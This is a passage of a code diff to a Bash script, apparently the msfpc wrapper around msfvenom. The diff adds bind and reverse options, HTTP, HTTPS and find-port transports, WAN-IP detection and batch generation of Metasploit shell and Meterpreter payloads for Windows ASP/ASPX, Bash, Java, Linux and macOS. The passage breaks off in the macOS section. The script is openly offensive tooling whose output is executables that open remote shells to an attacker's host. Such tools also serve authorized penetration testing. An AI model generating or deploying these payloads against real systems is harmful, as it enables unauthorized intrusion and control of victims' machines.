&& CMD="\curl -s" || CMD="\wget -U 'curl' -qO-" + for url in 'http://ipinfo.io/ip' 'http://ifconfig.io/'; do + WAN=$(eval ${CMD} "${url}") + [[ -n "${WAN}" ]] && break + done + [[ "${VERBOSE}" == "true" && -z "${WAN}" ]] && echo -e " ${YELLOW}[i]${RESET} Something went wrong. ${RED}Couldn't get external WAN IP${RESET}" >&2 fi ## Is there a writeable path for us? @@ -160,23 +257,24 @@ if [[ ! -d "${OUTPATH}" ]]; then fi -## Get default values +## Get default values (before batch/loop) +[[ -z "${PORT}" ]] && PORT="443" IFACE=( $(\awk '/:/ {print $1}' /proc/net/dev | \sed 's_:__') ) IPs=( $(\ifconfig | \grep 'inet addr:' | \cut -d':' -f2 | \cut -d' ' -f1) ) # OSX -> \ifconfig | \grep inet | \grep -E '([[:digit:]]{1,2}.){4}' | \sed -e 's_[:|addr|inet]__g; s_^[ \t]*__' | \awk '{print $1}' -TYPEs=( asp aspx bash java linux osx perl php powershell python tomcat windows ) # Must always be a higher count than ${FORMATs} +TYPEs=( asp aspx bash java linux osx perl php powershell python tomcat windows ) # Due to how its coded, this must always be a higher array count than ${FORMATs} FORMATs=( sh jsp lin elf macho pl ps1 py war win exe ) ## Check user input ## Able to detect NIC interfaces? -if [[ "${IFACE}" == "" ]]; then +if [[ -z "${IFACE}" ]]; then echo -e " ${YELLOW}[i]${RESET} Something went wrong. ${RED}Couldn't find any network interfaces${RESET}" >&2 echo -e " ${YELLOW}[i]${RESET} Need to manually define an IP. ${YELLOW}${0} --ip ${RESET}" >&2 exit 2 fi ## Able to detect IP addresses? -if [[ "${IPs}" == "" ]]; then +if [[ -z "${IPs}" ]]; then echo -e " ${YELLOW}[i]${RESET} Something went wrong. ${RED}Couldn't discover IP addresses${RESET}. =(" >&2 echo -e " ${YELLOW}[i]${RESET} Need to manually define it. ${YELLOW}${0} --ip ${RESET}" >&2 exit 2 @@ -184,23 +282,31 @@ fi ## (!!!Magic Alert!!!) Try to predict what's what with inputs... for x in $(\tr '[:upper:]' '[:lower:]' <<< "$@" ); do - if [[ "${x}" =~ ^--* ]]; then true # Long argument? (skip!) - elif [[ "${x}" == "verbose" || "${x}" == "v" ]]; then VERBOSE=true # Verbose? - elif [[ "${x}" == "all" || "${x}" == "batch" || "${x}" == "a" ]]; then BATCH=true # Batch mode? - elif [[ "${x}" == "loop" || "${x}" == "l" ]]; then LOOP=true # Loop mode? - elif [[ "${x}" == "staged" || "${x}" == "stage" || "${x}" == "small" ]]; then STAGE=true # Staged? - elif [[ "${x}" == "stage"*"less" || "${x}" == "single" || "${x}" == "inline" || "${x}" == "no"* || "${x}" == "full" ]]; then STAGE=false # Stageless? - elif [[ "${x}" == "cmd" || "${x}" == "shell" || "${x}" == "normal" ]]; then SHELL="shell" # Shell? - elif [[ "${x}" == "meterpreter" || "${x}" == "msf" || "${x}" == "meterp" ]]; then SHELL="meterpreter" # Meterpreter? - elif [[ "${x}" =~ ^-?[0-9]+$ && "${x}" -gt 1 && "${x}" -lt 65535 ]]; then PORT="${x}" # Port? - elif [[ "${x}" =~ ^([0-9]{1,3})[.]([0-9]{1,3})[.]([0-9]{1,3})[.]([0-9]{1,3})$ ]]; then IP="${x}" # IP? - elif [[ "${x}" == *.* ]]; then IP="${x}" # Domain/DNS? (weak detection & doesn't support hostname) + if [[ "${x}" =~ ^--* ]]; then true # Long argument? (skip!) + elif [[ "${x}" == "list" || "${x}" == "ls" || "${x}" == "options" || "${x}" == "show" || "${x}" == "help" ]]; then HELP=true # List types? (aka help screen) + elif [[ "${x}" == "verbose" || "${x}" == "v" ]]; then VERBOSE=true # Verbose? + elif [[ "${x}" == "all" || "${x}" == "batch" || "${x}" == "a" ]]; then BATCH=true # Batch mode? + elif [[ "${x}" == "loop" || "${x}" == "l" ]]; then LOOP=true # Loop mode? + elif [[ "${x}" == "cmd" || "${x}" == "shell" || "${x}" == "normal" ]]; then SHELL="shell" # Shell? + elif [[ "${x}" == "meterpreter" || "${x}" == "msf" || "${x}" == "meterp" ]]; then SHELL="meterpreter" # Meterpreter? + elif [[ "${x}" == "bind" || "${x}" == "listen" ]]; then DIRECTION="bind" # Bind payload? + elif [[ "${x}" == "reverse" || "${x}" == "rev" ]]; then DIRECTION="reverse" # Reverse payload? (default) + elif [[ "${x}" == "staged" || "${x}" == "stager" || "${x}" == "stage" || "${x}" == "small" ]]; then STAGE=true # Staged? + elif [[ "${x}" == "stage"*"less" || "${x}" == "single" || "${x}" == "inline" || "${x}" == "no"* || "${x}" == "full" ]]; then STAGE=false # Stageless? + elif [[ "${x}" == "https" || "${x}" == "ssl" || "${x}" == "tls" ]]; then METHOD="https" # HTTPS payload? + elif [[ "${x}" == "http" || "${x}" == "www" ]]; then METHOD="http" # HTTP payload? + elif [[ "${x}" == "tcp" ]]; then METHOD="tcp" # TCP payload? (default) + elif [[ "${x}" == "find"* || "${x}" == "allport"* ]]; then METHOD="find_port" # Find_Port payload? + elif [[ "${x}" =~ ^-?[0-9]+$ && "${x}" -gt 1 && "${x}" -lt 65535 ]]; then PORT="${x}" # Port? + elif [[ "${x}" =~ ^([0-9]{1,3})[.]([0-9]{1,3})[.]([0-9]{1,3})[.]([0-9]{1,3})$ ]]; then IP="${x}" # IP? + elif [[ "${x}" == *.* ]]; then IP="${x}" # Domain/DNS? (weak detection & doesn't support hostname) + elif [[ "${x}" == "wan" && -n "${WAN}" ]]; then IP="${WAN}" # WAN interface? else known=false - for (( i=0; i<${#IFACE[@]}; ++i )); do [[ "${x}" == "${IFACE[${i}]}" ]] && IP="${IPs[${i}]}" && known=true && break; done # Interface? (rather than a an IP) - for (( i=0; i<${#TYPEs[@]}; ++i )); do [[ "${x}" == "${TYPEs[${i}]}" ]] && TYPE="${TYPEs[${i}]}" && known=true && break; done # Type? - for (( i=0; i<${#FORMATs[@]}; ++i )); do [[ "${x}" == "${FORMATs[${i}]}" ]] && TYPE="${FORMATs[${i}]}" && known=true && break; done # Type? (aka formats) - [[ "${known}" == false ]] && echo -e " ${YELLOW}[i]${RESET} Unable to detect value: ${RED}${x}${RESET}" && exit 1 # ...if we got this far, we failed. =( + for (( i=0; i<${#IFACE[@]}; ++i )); do [[ "${x}" == "${IFACE[${i}]}" ]] && IP="${IPs[${i}]}" && known=true && break; done # Interface? (rather than a an IP) + for (( i=0; i<${#TYPEs[@]}; ++i )); do [[ "${x}" == "${TYPEs[${i}]}" ]] && TYPE="${TYPEs[${i}]}" && known=true && break; done # Type? + for (( i=0; i<${#FORMATs[@]}; ++i )); do [[ "${x}" == "${FORMATs[${i}]}" ]] && TYPE="${FORMATs[${i}]}" && known=true && break; done # Type? (aka formats) + [[ "${known}" == false ]] && echo -e " ${YELLOW}[i]${RESET} Unable to detect value: ${RED}${x}${RESET}" && exit 1 # ...if we got this far, we failed. =( fi done @@ -211,6 +317,10 @@ while [[ "${#}" -gt 0 && ."${1}" == .-* ]]; do case "$(echo ${opt} | tr '[:upper:]' '[:lower:]')" in -|-- ) break 2;; + -p|--platform ) + TYPE="${1}"; shift;; + --platform=* ) + TYPE="${opt#*=}";; -t|--type ) TYPE="${1}"; shift;; --type=* ) @@ -226,15 +336,6 @@ while [[ "${#}" -gt 0 && ."${1}" == .-* ]]; do --port=* ) PORT="${opt#*=}";; - -s|--staged ) - STAGE=true;; - --stageless ) - STAGE=false;; - --stage ) - STAGE="${1}"; shift;; - --stage=* ) - STAGE="${opt#*=}";; - -m|--msf|--meterpreter ) SHELL="meterpreter";; -c|--cmd|--shell ) @@ -244,36 +345,87 @@ while [[ "${#}" -gt 0 && ."${1}" == .-* ]]; do --shell=* ) SHELL="${opt#*=}";; + -b|--bind|--listen ) + DIRECTION="bind";; + -r|--rev|--reverse ) + DIRECTION="reverse";; + --direction ) + DIRECTION="${1}"; shift;; + --direction=* ) + DIRECTION="${opt#*=}";; + + -s|--staged|--stager ) + STAGE=true;; + --stageless ) + STAGE=false;; + --stage ) + STAGE="${1}"; shift;; + --stage=* ) + STAGE="${opt#*=}";; + + -t|--tcp ) + METHOD="tcp";; + --http|--www ) + METHOD="http";; + --https|--ssl|--tls ) + METHOD="https";; + -f|--find|--all|--find_port|--find-port|--findport|--allports|--all-ports|--all_ports ) + METHOD="find_port";; + --method ) + METHOD="${1}"; shift;; + --method=* ) + METHOD="${opt#*=}";; + -a|--all|--batch ) BATCH=true;; -l|--loop ) LOOP=true;; - --verbose ) + -v|--verbose ) VERBOSE=true;; + -h|--help|-ls|--list|--options ) + HELP=true;; + *) echo -e " ${YELLOW}[i]${RESET} Invalid option: ${RED}${x}${RESET}" && exit 1;; esac done -## Set default values -[[ -z "${PORT}" ]] && PORT="443" - if [[ "${STAGE}" == "true" || "${STAGE}" == "staged" || "${STAGE}" == "stage" || "${STAGE}" == "small" ]]; then STAGE='staged'; _STAGE='/' -elif [[ "${STAGE}" == "false" || "${STAGE}" == "stage"*"less" || "${STAGE}" == "single" || "${STAGE}" == "inline" || "${STAGE}" == "no"* || "${STAGE}" == "full" ]]; then STAGE='stageless'; _STAGE='_'; fi -#else STAGE="_"; fi # <--- cant due to batch mode + +## Display help? +[[ "${HELP}" == true ]] && doHelp + + +## Check input if [[ "${SHELL}" == "shell" || "${SHELL}" == "cmd" || "${SHELL}" == "normal" ]]; then SHELL="shell" elif [[ "${SHELL}" == "meterpreter" || "${SHELL}" == "msf" || "${SHELL}" == "meterp" ]]; then SHELL="meterpreter"; fi -#else SHELL="meterpreter"; fi # <--- cant due to batch mode +#else SHELL="meterpreter"; fi # <--- cant due to batch mode (same with [[ -z "${SHELL}" ]]) + + if [[ "${DIRECTION}" == "reverse" || "${DIRECTION}" == "rev" ]]; then DIRECTION="reverse" +elif [[ "${DIRECTION}" == "bind" || "${DIRECTION}" == "listen" ]]; then DIRECTION="bind"; fi + + if [[ "${STAGE}" == "true" || "${STAGE}" == "staged" || "${STAGE}" == "stager" || "${STAGE}" == "stage" || "${STAGE}" == "small" ]]; then STAGE='staged'; _STAGE='/' +elif [[ "${STAGE}" == "false" || "${STAGE}" == "stage"*"less" || "${STAGE}" == "single" || "${STAGE}" == "inline" || "${STAGE}" == "no"* || "${STAGE}" == "full" ]]; then STAGE='stageless'; _STAGE='_'; fi + + if [[ "${METHOD}" == "tcp" ]]; then METHOD="tcp" +elif [[ "${METHOD}" == "http" || "${METHOD}" == "www" ]]; then METHOD="http" +elif [[ "${METHOD}" == "https" || "${METHOD}" == "tls" || "${METHOD}" == "ssl" ]]; then METHOD="https" +elif [[ "${METHOD}" == "find"* || "${METHOD}" == "all"* ]]; then METHOD="find_port"; fi ## Did user enter an interface instead of an IP address? for (( x=0; x<${#IFACE[@]}; ++x )); do [[ "${IP}" == "${IFACE[${x}]}" ]] && IP=${IPs[${x}]} && break; done +## WAN interface? +if [[ -n "${WAN}" && "${IP}" == "${WAN}" ]]; then + [[ "${VERBOSE}" == "true" ]] && echo -e " ${YELLOW}[i]${RESET} WAN IP: ${YELLOW}${WAN}${RESET} " +fi + ## Valued entered for IP address? Is it a valid IPv4 address? Else assume its a domain... if [[ "${IP}" =~ ^([0-9]{1,3})[.]([0-9]{1,3})[.]([0-9]{1,3})[.]([0-9]{1,3})$ ]]; then for (( i=1; i<${#BASH_REMATCH[@]}; ++i )); do (( ${BASH_REMATCH[${i}]} <= 255 )) || { echo -e " ${YELLOW}[i]${RESET} IP (${IP}) appears to be a ${RED}invalid IPv4 address${RESET} =(" >&2 && exit 3; } done -elif [[ "${IP}" != "" ]]; then +elif [[ -n "${IP}" ]]; then echo -e " ${YELLOW}[i]${RESET} ${IP} isn't a IPv4 address. ${YELLOW}Assuming its a domain name${RESET}..." DOMAIN=true fi @@ -284,22 +436,23 @@ if [[ "${PORT}" -lt 1 || "${PORT}" -gt 65535 ]]; then exit 3 fi + ## IP menu if [[ -n "${TYPE}" && -z "${IP}" ]]; then echo -e "\n ${YELLOW}[i]${RESET} Use which ${BLUE}interface${RESET}/${YELLOW}IP address${RESET}?:" I=0 for iface in "${IFACE[@]}"; do IPs[${I}]="$(\ifconfig ${iface} | \grep 'inet addr:' | \cut -d':' -f2 | \cut -d' ' -f1 | sort)" - [[ "${IPs[${I}]}" == "" ]] && IPs[${I}]="UNKNOWN" - + [[ -z "${IPs[${I}]}" ]] && IPs[${I}]="UNKNOWN" echo -e " ${YELLOW}[i]${RESET} ${GREEN}$[${I}+1]${RESET}.) ${BLUE}${iface}${RESET} - ${YELLOW}${IPs[${I}]}${RESET}" - I=$[${I}+1] done + [[ -n "${WAN}" ]] && I=$[${I}+1] && echo -e " ${YELLOW}[i]${RESET} ${GREEN}$[${I}]${RESET}.) ${BLUE}wan${RESET} - ${YELLOW}${WAN}${RESET}" _IP="" - while [[ "${_IP}" == "" ]]; do - echo -ne " ${YELLOW}[?]${RESET} ${GREEN}Select${RESET} 1-${I}, ${BLUE}interface${RESET} or ${YELLOW}IP address${RESET}"; read -p ": " INPUT - for (( x=0; x<${#IFACE[@]}; ++x )); do [[ "${INPUT}" == "${IFACE[${x}]}" ]] && _IP="${IPs[${x}]}"; done # Did user enter interface? + while [[ -z "${_IP}" ]]; do + echo -ne " ${YELLOW}[?]${RESET} Select ${GREEN}1-${I}${RESET}, ${BLUE}interface${RESET} or ${YELLOW}IP address${RESET}"; read -p ": " INPUT + for (( x=0; x<${I}; ++x )); do [[ "${INPUT}" == "${IFACE[${x}]}" ]] && _IP="${IPs[${x}]}"; done # Did user enter interface? + [[ -n "${WAN}" && "${INPUT}" == "${INPUT}" ]] && _IP="${WAN}" # Did user enter wan? [[ "${INPUT}" != *"."* && "${INPUT}" -ge 1 && "${INPUT}" -le "${I}" ]] && _IP="${IPs[${INPUT}-1]}" # Did user select number? #for ip in "${IPs[@]}"; do [[ "${INPUT}" == "${ip}" ]] && _IP="${ip}"; done # Did user enter a known IP? [[ "${INPUT}" =~ ^([0-9]{1,3})[.]([0-9]{1,3})[.]([0-9]{1,3})[.]([0-9]{1,3})$ ]] && _IP="${INPUT}" # Did the user enter a IP address (doesn't valid it) @@ -309,237 +462,265 @@ if [[ -n "${TYPE}" && -z "${IP}" ]]; then fi -## Generate #1 (Looping) +## Generate #1 (Batch/Looping) ## Loop mode? if [[ "${LOOP}" == "true" ]]; then + echo -e " ${YELLOW}[i]${RESET} Loop Mode. ${BOLD}Creating one of each TYPE${RESET}, with default values" + [[ "${VERBOSE}" == "true" ]] && _VERBOSE="verbose" for (( i=0; i<${#TYPEs[@]}; ++i )); do - echo "" + echo "" # "${TYPEs[${i}]}" "${IP}" "${PORT}" "${_VERBOSE}" eval "${0}" "${TYPEs[${i}]}" "${IP}" "${PORT}" "${_VERBOSE}" echo "" done # for TYPEs[@] - TYPE="" -## Batch mode? elif [[ "${BATCH}" == "true" ]]; then + echo -e " ${YELLOW}[i]${RESET} Batch Mode. ${BOLD}Creating as many different combinations as possible${RESET}" + [[ "${VERBOSE}" == "true" ]] && _VERBOSE="verbose" for (( i=0; i<${#TYPEs[@]}; ++i )); do if [[ -z "${TYPE}" || "${TYPEs[${i}]}" == "${TYPE}" || "${FORMATs[${i}]}" == "${TYPE}" ]]; then type="${TYPEs[${i}]}" [[ -n "${TYPE}" && "${FORMATs[${i}]}" == "${TYPE}" ]] && type="${FORMATs[${i}]}" - for staged in staged stageless; do - if [[ -z "${STAGE}" || "${staged}" == "${STAGE}" ]]; then - for shell in meterpreter shell; do - if [[ -z "${SHELL}" || "${shell}" == "${SHELL}" ]]; then - [[ "${VERBOSE}" == "true" ]] && _VERBOSE="verbose" - echo "" - eval "${0}" "${type}" "${IP}" "${PORT}" "${shell}" "${staged}" "${_VERBOSE}" - echo "" - fi # "${shell}" == "${SHELL}" - done # for shell - fi # "${staged}" == "${STAGE}" - done # for staged + for shell in "meterpreter" "shell"; do + if [[ -z "${SHELL}" || "${shell}" == "${SHELL}" ]]; then + for direction in "reverse" "bind"; do + if [[ -z "${DIRECTION}" || "${direction}" == "${DIRECTION}" ]]; then + for staged in "staged" "stageless"; do + if [[ -z "${STAGE}" || "${staged}" == "${STAGE}" ]]; then + for method in "tcp" "http" "https" "find_port"; do + if [[ -z "${METHOD}" || "${method}" == "${METHOD}" ]]; then + echo ""  # "${type}" "${IP}" "${PORT}" "${direction}" "${staged}" "${method}" "${shell}" "${_VERBOSE}" + eval "${0}" "${type}" "${IP}" "${PORT}" "${direction}" "${staged}" "${method}" "${shell}" "${_VERBOSE}" + echo "" + fi # "${method}" == "${METHOD}" + done # for protocol + fi # "${staged}" == "${STAGE}" + done # for staged + fi # "${direction}" == "${DIRECTION}" + done # for direction + fi # "${shell}" == "${SHELL}" + done # for shell echo -e "\n" fi # "${TYPEs[${i}]}" == "${TYPE}" done # for TYPEs[@] - TYPE="" fi +## Set default values (after batch/loop) +[[ -z "${METHOD}" ]] && METHOD="tcp" +[[ -z "${DIRECTION}" ]] && DIRECTION="reverse" + ## Valid shell? -if [[ -n "${TYPE}" && "${SHELL}" != "shell" && "${SHELL}" != "meterpreter" && "${SHELL}" != "" ]]; then +if [[ -n "${TYPE}" && "${SHELL}" != "shell" && "${SHELL}" != "meterpreter" && -n "${SHELL}" ]]; then echo -e " ${YELLOW}[i]${RESET} SHELL (${SHELL}) is incorrect. Needs to be either ${YELLOW}shell${RESET} or ${YELLOW}meterpreter${RESET}" >&2 exit 3 fi ## Valid staged? -if [[ -n "${TYPE}" && "${STAGE}" != "staged" && "${STAGE}" != "stageless" && "${STAGE}" != "" ]]; then +if [[ -n "${TYPE}" && "${STAGE}" != "staged" && "${STAGE}" != "stageless" && -n "${STAGE}" ]]; then echo -e " ${YELLOW}[i]${RESET} STAGED (${STAGE}) is incorrect. Needs to be either ${YELLOW}staged${RESET} or ${YELLOW}stageless${RESET}" >&2 exit 3 -elif [[ -n "${TYPE}" && "${_STAGE}" != "/" && "${_STAGE}" != "_" && "${STAGE}" != "" ]]; then # "${STAGE}" != "" is correct +elif [[ -n "${TYPE}" && "${_STAGE}" != "/" && "${_STAGE}" != "_" && -n "${STAGE}" ]]; then # "${STAGE}" != "" is correct echo -e " ${YELLOW}[i]${RESET} ${RED}Something went wrong (Internally) with stage: ${_STAGE}.${RESET}" exit 2 fi +## If its not reverse (bind), the only option is tcp (not http/https/find_ports) +if [[ "${DIRECTION}" != "reverse" && "${METHOD}" != "tcp" ]]; then + echo -e " ${YELLOW}[i]${RESET} Unable to use ${METHOD} with ${DIRECTION}. Please ${YELLOW}switch to reverse${RESET}" >&2 + exit 3 +fi + -## Generate #2 (Main) +## Generate #2 (Single Payload) ## ASP if [[ "${TYPE}" == "asp" ]]; then - [[ "${SHELL}" == "" ]] && SHELL="meterpreter" - [[ "${STAGE}" == "" ]] && STAGE="staged" && _STAGE="/" - # stageless meterpreter - The EXE generator now has a max size of 2048 bytes, please fix the calling module + [[ -z "${SHELL}" ]] && SHELL="meterpreter" + [[ -z "${STAGE}" ]] && STAGE="staged" && _STAGE="/" + [[ "${METHOD}" == "find_port" ]] && METHOD="allports" + # Can't do: stageless meterpreter - The EXE generator now has a max size of 2048 bytes, please fix the calling module if [[ "${STAGE}" == "stageless" && "${SHELL}" == "meterpreter" ]]; then - echo -e " ${YELLOW}[i]${RESET} Unable to do STAGELESS METERPRETER ASP. Goes over Metasploit's ${RED}file size limit${RESET}. =(" >&2 - [[ "${VERBOSE}" != 'true' ]] && exit 5 + echo -e " ${YELLOW}[i]${RESET} Unable to do ${STAGE} ${SHELL} ASP. The result is over Metasploit's ${RED}file size limit${RESET}. =(" >&2 + #[[ "${VERBOSE}" != 'true' ]] && exit 5 # Force pass the warning? fi TYPE="windows" FILEEXT="asp" - PAYLOAD="${TYPE}/${SHELL}${_STAGE}reverse_tcp" - CMD="msfvenom -p ${PAYLOAD} -f ${FILEEXT} --platform ${TYPE} -a x86 -e generic/none LHOST=${IP} LPORT=${PORT} -o ${OUTPATH}${TYPE}-${STAGE}-${SHELL}-${PORT}.${FILEEXT}" - doAction "${TYPE}" "${IP}" "${PORT}" "${PAYLOAD}" "${CMD}" "${FILEEXT}" "${SHELL}" "${STAGE}" "${VERBOSE}" + PAYLOAD="${TYPE}/${SHELL}${_STAGE}${DIRECTION}_${METHOD}" + CMD="msfvenom -p ${PAYLOAD} -f ${FILEEXT} --platform ${TYPE} -a x86 -e generic/none LHOST=${IP} LPORT=${PORT} > ${OUTPATH}${TYPE}-${SHELL}-${STAGE}-${DIRECTION}-${METHOD}-${PORT}.${FILEEXT}" + doAction "${TYPE}" "${IP}" "${PORT}" "${PAYLOAD}" "${CMD}" "${FILEEXT}" "${SHELL}" "${DIRECTION}" "${STAGE}" "${METHOD}" "${VERBOSE}" ## ASPX elif [[ "${TYPE}" == "aspx" ]]; then - [[ "${SHELL}" == "" ]] && SHELL="meterpreter" - [[ "${STAGE}" == "" ]] && STAGE="stageless" && _STAGE="_" + [[ -z "${SHELL}" ]] && SHELL="meterpreter" + [[ -z "${STAGE}" ]] && STAGE="staged" && _STAGE="/" + [[ "${METHOD}" == "find_port" ]] && METHOD="allports" + # Its able todo anything that you throw at it =). TYPE="windows" FILEEXT="aspx" - PAYLOAD="${TYPE}/${SHELL}${_STAGE}reverse_tcp" - CMD="msfvenom -p ${PAYLOAD} -f ${FILEEXT} --platform ${TYPE} -a x86 -e generic/none LHOST=${IP} LPORT=${PORT} -o ${OUTPATH}${TYPE}-${STAGE}-${SHELL}-${PORT}.${FILEEXT}" - doAction "${TYPE}" "${IP}" "${PORT}" "${PAYLOAD}" "${CMD}" "${FILEEXT}" "${SHELL}" "${STAGE}" "${VERBOSE}" + PAYLOAD="${TYPE}/${SHELL}${_STAGE}${DIRECTION}_${METHOD}" + CMD="msfvenom -p ${PAYLOAD} -f ${FILEEXT} --platform ${TYPE} -a x86 -e generic/none LHOST=${IP} LPORT=${PORT} > ${OUTPATH}${TYPE}-${SHELL}-${STAGE}-${DIRECTION}-${METHOD}-${PORT}.${FILEEXT}" + doAction "${TYPE}" "${IP}" "${PORT}" "${PAYLOAD}" "${CMD}" "${FILEEXT}" "${SHELL}" "${DIRECTION}" "${STAGE}" "${METHOD}" "${VERBOSE}" ## Bash elif [[ "${TYPE}" == "bash" || "${TYPE}" == "sh" ]]; then - [[ "${SHELL}" == "" ]] && SHELL="shell" - [[ "${STAGE}" == "" ]] && STAGE="staged" && _STAGE="/" - # meterpreter or stageless - Invalid Payload Selected + [[ -z "${SHELL}" ]] && SHELL="shell" + [[ -z "${STAGE}" ]] && STAGE="staged" && _STAGE="/" + # Can't do: meterpreter or stageless - Invalid Payload Selected + # Can't do: bind option // http, https or find_port options if [[ "${STAGE}" == "stageless" ]]; then - echo -e " ${YELLOW}[i]${RESET} Unable to do STAGLESSS BASH. There ${RED}isn't a option in Metasploit to allow it${RESET}. =(" >&2 - [[ "${VERBOSE}" != 'true' ]] && exit 5 + echo -e " ${YELLOW}[i]${RESET} Unable to do ${STAGE}. There ${RED}isn't a option in Metasploit to allow it${RESET}. =(" >&2 elif [[ "${SHELL}" == "meterpreter" ]]; then - echo -e " ${YELLOW}[i]${RESET} Unable to do METERPRETER BASH. There ${RED}isn't a BASH Meterpreter${RESET}...yet." >&2 - [[ "${VERBOSE}" != 'true' ]] && exit 5 + echo -e " ${YELLOW}[i]${RESET} Unable to do ${SHELL} Bash. There ${RED}isn't a Bash ${SHELL}${RESET}...yet?" >&2 + elif [[ "${DIRECTION}" != "reverse" ]]; then + echo -e " ${YELLOW}[i]${RESET} Unable to do ${DIRECTION}. There ${RED}isn't a ${DIRECTION} Bash${RESET}...yet?" >&2 fi TYPE="bash" FILEEXT="sh" - PAYLOAD="cmd/unix${_STAGE}reverse_bash" - CMD="msfvenom -p ${PAYLOAD} -f raw --platform unix -e generic/none -a cmd LHOST=${IP} LPORT=${PORT} -o ${OUTPATH}${TYPE}-${STAGE}-${SHELL}-${PORT}.${FILEEXT}" - doAction "${TYPE}" "${IP}" "${PORT}" "${PAYLOAD}" "${CMD}" "${FILEEXT}" "${SHELL}" "${STAGE}" "${VERBOSE}" + PAYLOAD="cmd/unix${_STAGE}${DIRECTION}_bash" + CMD="msfvenom -p ${PAYLOAD} -f raw --platform unix -e generic/none -a cmd LHOST=${IP} LPORT=${PORT} > ${OUTPATH}${TYPE}-${SHELL}-${STAGE}-${DIRECTION}-${METHOD}-${PORT}.${FILEEXT}" + doAction "${TYPE}" "${IP}" "${PORT}" "${PAYLOAD}" "${CMD}" "${FILEEXT}" "${SHELL}" "${DIRECTION}" "${STAGE}" "${METHOD}" "${VERBOSE}" ## Java elif [[ "${TYPE}" == "java" || "${TYPE}" == "jsp" ]]; then - [[ "${SHELL}" == "" ]] && SHELL="meterpreter" - [[ "${STAGE}" == "" ]] && STAGE="staged" && _STAGE="/" - # stageless meterpreter - Invalid Payload Selected + [[ -z "${SHELL}" ]] && SHELL="meterpreter" + [[ -z "${STAGE}" ]] && STAGE="staged" && _STAGE="/" + # Can't do: stageless meterpreter - Invalid Payload Selected if [[ "${STAGE}" == "stageless" && "${SHELL}" == "meterpreter" ]]; then - echo -e " ${YELLOW}[i]${RESET} Unable to do STAGELESS METERPRETER JAVA. There ${RED}isn't a option in Metasploit to allow it${RESET}. =(" >&2 - [[ "${VERBOSE}" != 'true' ]] && exit 5 + echo -e " ${YELLOW}[i]${RESET} Unable to do ${STAGE} ${SHELL} Java. There ${RED}isn't a option in Metasploit to allow it${RESET}. =(" >&2 fi TYPE="java" FILEEXT="jsp" - PAYLOAD="${TYPE}/${SHELL}${_STAGE}reverse_tcp" - CMD="msfvenom -p ${PAYLOAD} -f raw --platform ${TYPE} -e generic/none -a ${TYPE} LHOST=${IP} LPORT=${PORT} -o ${OUTPATH}${TYPE}-${STAGE}-${SHELL}-${PORT}.${FILEEXT}" - doAction "${TYPE}" "${IP}" "${PORT}" "${PAYLOAD}" "${CMD}" "${FILEEXT}" "${SHELL}" "${STAGE}" "${VERBOSE}" + PAYLOAD="${TYPE}/${SHELL}${_STAGE}${DIRECTION}_${METHOD}" + CMD="msfvenom -p ${PAYLOAD} -f raw --platform ${TYPE} -e generic/none -a ${TYPE} LHOST=${IP} LPORT=${PORT} > ${OUTPATH}${TYPE}-${SHELL}-${STAGE}-${DIRECTION}-${METHOD}-${PORT}.${FILEEXT}" + doAction "${TYPE}" "${IP}" "${PORT}" "${PAYLOAD}" "${CMD}" "${FILEEXT}" "${SHELL}" "${DIRECTION}" "${STAGE}" "${METHOD}" "${VERBOSE}" ## Linux elif [[ "${TYPE}" == "linux" || "${TYPE}" == "lin" || "${TYPE}" == "elf" ]]; then - [[ "${SHELL}" == "" ]] && SHELL="meterpreter" - [[ "${STAGE}" == "" ]] && STAGE="staged" && _STAGE="/" - # stageless meterpreter - Invalid Payload Selected + [[ -z "${SHELL}" ]] && SHELL="shell" + [[ -z "${STAGE}" ]] && STAGE="staged" && _STAGE="/" + # Can't do: stageless meterpreter - Invalid Payload Selected if [[ "${STAGE}" == "stageless" && "${SHELL}" == "meterpreter" ]]; then - echo -e " ${YELLOW}[i]${RESET} Unable to do STAGELESS METERPRETER LINUX. There ${RED}isn't a option in Metasploit to allow it${RESET}. =(" >&2 - [[ "${VERBOSE}" != 'true' ]] && exit 5 + echo -e " ${YELLOW}[i]${RESET} Unable to do ${STAGE} ${SHELL} Linux. There ${RED}isn't a option in Metasploit to allow it${RESET}. =(" >&2 fi TYPE="linux" FILEEXT="elf" #bin - PAYLOAD="${TYPE}/x86/${SHELL}${_STAGE}reverse_tcp" - CMD="msfvenom -p ${PAYLOAD} -f ${FILEEXT} --platform ${TYPE} -a x86 -e generic/none LHOST=${IP} LPORT=${PORT} -o ${OUTPATH}${TYPE}-${STAGE}-${SHELL}-${PORT}.${FILEEXT}" - doAction "${TYPE}" "${IP}" "${PORT}" "${PAYLOAD}" "${CMD}" "${FILEEXT}" "${SHELL}" "${STAGE}" "${VERBOSE}" + PAYLOAD="${TYPE}/x86/${SHELL}${_STAGE}${DIRECTION}_${METHOD}" + CMD="msfvenom -p ${PAYLOAD} -f ${FILEEXT} --platform ${TYPE} -a x86 -e generic/none LHOST=${IP} LPORT=${PORT} > ${OUTPATH}${TYPE}-${SHELL}-${STAGE}-${DIRECTION}-${METHOD}-${PORT}.${FILEEXT}" + doAction "${TYPE}" "${IP}" "${PORT}" "${PAYLOAD}" "${CMD}" "${FILEEXT}" "${SHELL}" "${DIRECTION}" "${STAGE}" "${METHOD}" "${VERBOSE}" ## OSX elif [[ "${TYPE}" == "osx" || "${TYPE}" == "macho" ]]; then - [[ "${SHELL}" == "" ]] && SHELL="shell" - [[ "${STAGE}" == "" ]] && STAGE="stageless" && _STAGE="_" - # meterpreter or stageless - Invalid Payload Selected - if [[ "${STAGE}" == "/" ]]; then - echo -e " ${YELLOW}[i]${RESET} Unable to do STAGLED OSX. There ${RED}isn't a option in Metasploit to allow it${RESET}. =(" >&2 - [[ "${VERBOSE}" != 'true' ]] && exit 5 + [[ -z "${SHELL}" ]] && SHELL="shell" + [[ -z "${STAGE}" ]] && STAGE="stageless" && _STAGE="_" + # Can't do: meterpreter or stageless - Invalid Payload Selected + if [[ "${STAGE}" == "staged" ]]; then + echo -e " ${YELLOW}[i]${RESET} Unable to do ${STAGE} OSX. There ${RED}isn't a option in Metasploit to allow it${RESET}. =(" >&2 elif [[ "${SHELL}" == "meterpreter" ]]; then - echo -e " ${YELLOW}[i]${RESET} Unable to do METERPRETER OSX. There ${RED}isn't a OSX Meterpreter${RESET}...yet." >&2 - [[ "${VERBOSE}" != 'true' ]] && exit 5 + echo -e " ${YELLOW}[i]${RESET} Unable to do ${SHELL} OSX. There ${RED}isn't a OSX Meterpreter${RESET}...yet." >&2 fi TYPE="osx" FILEEXT="macho" - PAYLOAD="osx/x86/${SHELL}${_STAGE}reverse_tcp" 